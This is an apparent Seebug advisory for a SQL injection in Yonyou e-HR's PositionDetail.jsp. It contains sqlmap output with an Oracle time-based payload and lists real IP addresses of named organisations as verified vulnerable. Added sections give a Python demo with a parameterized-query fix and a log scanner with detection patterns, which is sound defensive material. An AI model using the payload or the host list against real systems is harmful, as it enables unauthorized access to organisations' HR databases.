Yonyou (用友) Human Resource Management (e-HR) SQL Injection Vulnerability

2014-07-09T00:00:00
ID SSV:93245
Type seebug
Reporter Root
Modified 2014-07-09T00:00:00

Description

Brief description:

Say something.

Detailed description:

![472F3300-37DA-4FDD-AAF3-E36E8A5A52F7.png](https://images.seebug.org/upload/201407/09172603828f8c376c669ace4f60371f368e3c3b.png)

![7DD296A6-915C-4763-9C00-E0110C272A7E.png](https://images.seebug.org/upload/201407/09172751d662bc843259287c82833cfc2deeb393.png)

The PK_EMPTY_JOB parameter of /hrss/rm/PositionDetail.jsp is vulnerable to SQL injection.

Just throw it straight into sqlmap:

```
http://219.140.193.253/hrss/rm/PositionDetail.jsp?PK_EMPTY_JOB=1001A11000000000G9WA&

GET parameter 'PK_EMPTY_JOB' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 114 HTTP(s) requests:

Place: GET
Parameter: PK_EMPTY_JOB
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: PK_EMPTY_JOB=1001A11000000000G9WA') AND 3750=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(119)||CHR(83)||CHR(84),5) AND ('nlJx'='nlJx&

[16:32:22] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[16:32:22] [INFO] fetched data logged to text files under '/Users/loli/sqlmap/output/219.140.193.253'
```

current user is DBA: True
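To show why the parameter is exploitable and what the fix looks like, here is an added example; it is not code from the original report or from Yonyou. It is a Python/SQLite stand-in for the query behind PositionDetail.jsp: the table and column names are assumptions, and the `IN ('...')` wrapping is inferred from the sqlmap payload, which closes the wrapper with `')` and reopens it with `('nlJx'='nlJx` so the template's own closing parenthesis still parses. SQLite has no DBMS_PIPE.RECEIVE_MESSAGE, so the breakout payload keeps the same quote-and-parenthesis structure but swaps the Oracle delay call for a tautology; with string concatenation it returns every row, with a bound parameter it matches nothing, and even an innocent apostrophe breaks the concatenated version.

```python
import sqlite3

# Constructed rows standing in for the e-HR vacancy ("empty job") records; the table
# and column names are assumptions, not Yonyou's real schema.
POSITIONS = [
    ("1001A11000000000G9WA", "Senior Engineer", "Wuhan"),
    ("1001V110000000000O0W", "Process Designer", "Fuzhou"),
    ("1001Z11000000000ZZZZ", "HR Manager", "Beijing"),
]

# Same "')" / "('x'='x" structure as the sqlmap payload on this page, with the
# Oracle-only DBMS_PIPE.RECEIVE_MESSAGE() delay replaced by a tautology so it runs in SQLite.
BREAKOUT = "1001A11000000000G9WA') OR 1=1 AND ('nlJx'='nlJx"


def open_db():
    """In-memory database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE empty_job (pk_empty_job TEXT PRIMARY KEY, title TEXT, city TEXT)"
    )
    conn.executemany("INSERT INTO empty_job VALUES (?, ?, ?)", POSITIONS)
    return conn


def unsafe_sql(pk_empty_job):
    """The pattern behind PositionDetail.jsp: request input glued into the statement.
    The IN ('...') wrapper is inferred from the payload, which closes it with ')
    and reopens it with ('nlJx'='nlJx so the template's final ')' still parses."""
    return (
        "SELECT pk_empty_job, title, city FROM empty_job "
        "WHERE pk_empty_job IN ('" + pk_empty_job + "')"
    )


def position_detail_unsafe(conn, pk_empty_job):
    """Vulnerable lookup: whatever the client sends becomes part of the SQL text."""
    return conn.execute(unsafe_sql(pk_empty_job)).fetchall()


def position_detail_safe(conn, pk_empty_job):
    """Bound parameter: the whole value travels as data, quotes and parens included."""
    sql = "SELECT pk_empty_job, title, city FROM empty_job WHERE pk_empty_job IN (?)"
    return conn.execute(sql, (pk_empty_job,)).fetchall()


def concatenation_breaks_on_quote(conn, value="O'Brien"):
    """Even non-malicious input with an apostrophe breaks the concatenated query."""
    try:
        position_detail_unsafe(conn, value)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = open_db()
    print(unsafe_sql(BREAKOUT))
    print("unsafe:", len(position_detail_unsafe(db, BREAKOUT)), "rows leaked")
    print("safe:  ", len(position_detail_safe(db, BREAKOUT)), "rows")
    print("plain quote breaks concatenation:", concatenation_breaks_on_quote(db))
```

The real fix for the JSP is the same shape as `position_detail_safe`: a `PreparedStatement` with the key bound as a parameter, ideally combined with rejecting anything that does not look like a surrogate key before it reaches the database.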

![YONGYOU1.png](https://images.seebug.org/upload/201407/09164325c42ab514edcb091ad718451b5cc638de.png)

Proof of vulnerability:

Some URLs (verified):

http://59.173.0.46:8090/hrss/rm/PositionDetail.jsp?PK_EMPTY_JOB=1001A11000000000G9WA& (中冶集团武汉勘察研究院有限公司, MCC Wuhan Surveying and Research Institute Co., Ltd.)

http://120.40.72.157:4001/hrss/rm/PositionDetail.jsp?PK_EMPTY_JOB=1001V110000000000O0W& (福建省石油化学工业设计院, Fujian Petrochemical Industry Design Institute)
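For anyone running one of these e-HR instances, an added example (not from the original report) of spotting such probes in web server access logs. It parses common-log-format lines, percent-decodes PK_EMPTY_JOB the way parse_qs does, and flags any value that is not a 20-character alphanumeric key (an assumption drawn from the two keys on this page) or that carries an Oracle time-based or out-of-band primitive. The log lines are constructed for the example; the second one is the percent-encoded form of the payload sqlmap reported above, the third is the plain single-quote probe.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed common-log-format lines (not a real capture). Line 2 carries the
# percent-encoded form of the sqlmap payload reported on this page; line 3 is the
# classic single-quote probe; lines 1 and 4 are ordinary lookups of the two keys above.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Jul/2014:16:31:58 +0800] "GET /hrss/rm/PositionDetail.jsp?PK_EMPTY_JOB=1001A11000000000G9WA& HTTP/1.1" 200 8123
10.0.0.9 - - [09/Jul/2014:16:32:20 +0800] "GET /hrss/rm/PositionDetail.jsp?PK_EMPTY_JOB=1001A11000000000G9WA%27%29%20AND%203750%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28108%29%7C%7CCHR%28119%29%7C%7CCHR%2883%29%7C%7CCHR%2884%29%2C5%29%20AND%20%28%27nlJx%27%3D%27nlJx& HTTP/1.1" 200 8123
10.0.0.9 - - [09/Jul/2014:16:32:21 +0800] "GET /hrss/rm/PositionDetail.jsp?PK_EMPTY_JOB=1001A11000000000G9WA%27 HTTP/1.1" 500 412
10.0.0.7 - - [09/Jul/2014:16:33:02 +0800] "GET /hrss/rm/PositionDetail.jsp?PK_EMPTY_JOB=1001V110000000000O0W& HTTP/1.1" 200 8011
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+$'
)

# Assumption taken from the two keys on this page: a genuine PK_EMPTY_JOB is a
# 20-character alphanumeric surrogate key. Anything else deserves a look.
PK_RE = re.compile(r"^[0-9A-Za-z]{20}$")

# Oracle primitives sqlmap relies on for time-based and out-of-band inference.
ORACLE_PROBE_RE = re.compile(
    r"DBMS_PIPE\.RECEIVE_MESSAGE|DBMS_LOCK\.SLEEP|UTL_INADDR|UTL_HTTP|CHR\(\d+\)\s*\|\|",
    re.IGNORECASE,
)


def classify_value(value):
    """Reason the decoded value is suspicious, or None for a well-formed key."""
    if PK_RE.match(value):
        return None
    if ORACLE_PROBE_RE.search(value):
        return "oracle time-based/oob primitive"
    if re.search(r"['\"()]", value):
        return "quote/paren breakout"
    return "malformed key"


def scan_log(text):
    """Return one finding per suspicious PositionDetail.jsp request, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/hrss/rm/PositionDetail.jsp"):
            continue
        # parse_qs percent-decodes each value and skips the empty pair left by the trailing "&"
        for value in parse_qs(parts.query, keep_blank_values=True).get("PK_EMPTY_JOB", []):
            reason = classify_value(value)
            if reason:
                findings.append(
                    {"ip": m.group("ip"), "ts": m.group("ts"), "status": m.group("status"),
                     "reason": reason, "value": value}
                )
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["status"], f["reason"], "->", f["value"][:60])
```

The allow-list check on the key format does most of the work; the Oracle signature list only labels why a value failed it. A time-based probe also tends to show up as a burst of requests from one source whose response times step up by the chosen delay (5 seconds in the payload above), which the log's size field will not reveal but a front-end that logs request duration will.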